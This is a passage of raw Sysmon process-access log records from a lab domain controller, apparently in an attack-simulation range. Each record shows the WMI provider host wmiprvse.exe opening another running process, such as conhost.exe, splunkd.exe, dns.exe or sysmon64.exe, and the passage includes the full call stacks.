Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023541Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.304{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A1A-6008-B100-00000000A301}2640C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023540Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.304{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023539Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.304{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A11-6008-9600-00000000A301}4612C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023538Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.304{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8200-00000000A301}4876C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023537Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.304{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8100-00000000A301}4864C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023536Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.304{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7F00-00000000A301}4328C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023535Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.304{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7E00-00000000A301}4316C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023534Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.304{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499C-6008-5500-00000000A301}3796C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023533Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.304{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499B-6008-5100-00000000A301}3588C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023532Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.304{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3600-00000000A301}3468C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023531Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.304{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3400-00000000A301}3124C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023530Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.304{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3300-00000000A301}2260C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023529Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.304{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3200-00000000A301}2612C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023528Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.304{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3100-00000000A301}2704C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023527Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.304{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3000-00000000A301}3068C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023526Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.304{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2E00-00000000A301}3028C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023525Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.304{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2D00-00000000A301}2328C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023524Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.304{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2C00-00000000A301}2896C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023523Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.304{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023522Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 